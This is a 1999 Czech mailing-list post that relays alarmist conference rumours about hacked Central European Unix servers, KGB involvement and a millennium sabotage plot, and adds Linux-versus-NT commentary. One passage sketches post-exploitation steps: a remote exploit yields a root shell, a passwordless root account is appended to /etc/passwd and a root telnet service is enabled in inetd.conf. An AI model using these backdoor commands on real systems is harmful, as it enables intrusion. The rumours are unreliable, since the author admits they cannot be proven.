Sokujici informace z Hannoveru
setuid
setuid na usa.net
Sobota Listopad 20 08:24:00 CET 1999
Zdar vsem.
Prave jsem se vratil z Hannoveru a mam pro pocitacovou verejnost sokujici
informace. Podle nekterych ucastniku, je vice jak 40 procent vsech
Internetovych serveru ve stredni a vychodni Evrope, bezicich pod OS unixoveho
typu, pod kontrolou "hackeru". Tyto informace nelze nijak dokazat,
ale ani je oznacit za nerealne. Podle nich, je stredni Evropa doslova
"hackerskym rajem".
Jeste horsi je, ze nejmene dvacet z tech ctyriceti ma KGB. Je notoricky znam
pripad Nemce Markuse Hesse, ktery v osmdesatych letech kradl informace
z vojenskych Unixu v USA a prodaval je KGB. Ze tato Ruska tajna sluzba
o tyto informace mela velky zajem dosvedcuje i to, ze koupila od Markuse
Hesse za 100 tisic marek informace "jak se to pronikani dela".
Mam informace, ze v soucastnosti se KGB soustreduje na region stredni Evropy.
Snazi se tento region elektronicky ovladnout.
Ze se nejedna o zadne pohadky "nemocneho" setuida, lze jednoduse
demonstrovat.
Ve svete zije spoustu ruznych silencu, kteri nemaji nic jineho na praci, nez
sledovat maily v konferenci Bugtraq. Staci si pockat, az nejaky pocitacovy
genius zverejni nejaky remote exploit a hned ho pouzit. Dobu cekani si muze
kratit skenovanim serveru v Ceske republice. Pak pouzije remote exploit.
Ten mu hodi shell:
[root na ns.fpr]# ./exploit 192.45.12.5
sending exploit code...
exploit was successful!
waiting for shell.....
bash#
napise:
bash# echo "arp::0:0::/tmp:/bin/bash" >> /etc/passwd
a jeste jednou:
bash# echo "kanec::505:505::/tmp:/bin/bash >> /etc/passwd
ted jiz muze pouzit ssh a nebo naposled:
bash# echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd" >>
/etc/inetd.conf
Tento radek napise, je-li tato sluzba zakazana. Pak uz jenom killall -HUP
inetd.
Po prihlaseni ma roota behem nekolika vterin. Takovej kanec to ma moc dobre
nacvicene. Nainstaluje velmi kvalitni backdoory a vse vrati do puvodniho
stavu. Nevim kolik toho stihne za jednu noc, ale asi dost.
Za nekolik dni, tuto chybu zverejni server underground.cz, ale to uz bude
pozde.
Takto "upravena" masina bezi naprosto normalne. Ze je to nerealne? Hmm.
Mam informace, ze neco chystaji na prelom tisicileti. Pravdepodobne se jedna
organizovane napsani prikazu rm -rf /. Nevim. Rozhodne bych doporucuval
velkou kontrolu systemu a na konci roku radeji server odpojit od Internetu.
Neco preci jiz naznacuje to, ze Americka vlada, nedoporucuje lety do Ceske
republiky na konci roku. Reakce nasi vlady je, ze jsou "spatne informovani"
Je mi jasne, ze Internet a rizeni letoveho provozu spolu moc nesouvisi, ale
i tak POZOR!!
Je pozoruhodne, ze se zde jen velmi malo, hovorilo o Windows NT. Z hlediska
bezpecnosti, jsou na tom NT mnohem lepe. Dokonce si dovolim tvrdit, ze
chce-li administrator klidne spat at rychle zahodi Linux. Polozim jednoduchou
otazku. Je mozne modifikovat system Windows NT tak, aby zde mel utocnik
moznost vzdaleneho pristupu na urovni administratora a kdykoli si vzpomene
smazat cely disk? Mozna ze ano, ale rozhodne to neni takova samozrejmost
jako u Linuxu. Trochu humoru: Predstavte si, kdyby Expandia banka pouzivala
na svem serveru Linux...bez komentare.
Hovorilo se tady o jednom zajimavem pripadu, ktery se stal v Polsku.
Firma, ktera se zabyvala bezpecnosti na Internetu, mela "dve tvare".
Aby meli co delat, nabouravali se do serveru velkych a prosperujicich firem.
Pak s touto firmou uzavreli velmi lukrativni smlouvu na komplexnim
zabezpeceni
serveru. Takto "pracovali asi tri roky". Nakonec byli odhaleni Polskou tajnou
sluzbou.
A ted na jine tema.
Konference se ucastnil pouze jeden specialista na bezpecnost telekomunikaci.
Ten hovoril o skvele technologii ASDL, ktera udajne do 10 let uplne vytlaci
ISDN. Technologie ISDN je udajne jiz zastarala a davno prekonana. To sem asi
nepatri, tak jenom kratce. ASDL umuznuje datovy prenos o rychlosti 8 Mb/s
smerem k uzivateli, po obycejnem metalickem paru (napr. telefonni ucastnicke
vedeni) a 640Kb/s smerem od uzivatele. To vse pri zachovani funkcnosti
telefonniho pristroje. Pouze je nutny specialni ASDL modem.
No kez by mel pravdu.
Chaos computer club
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
Další informace o konferenci Linux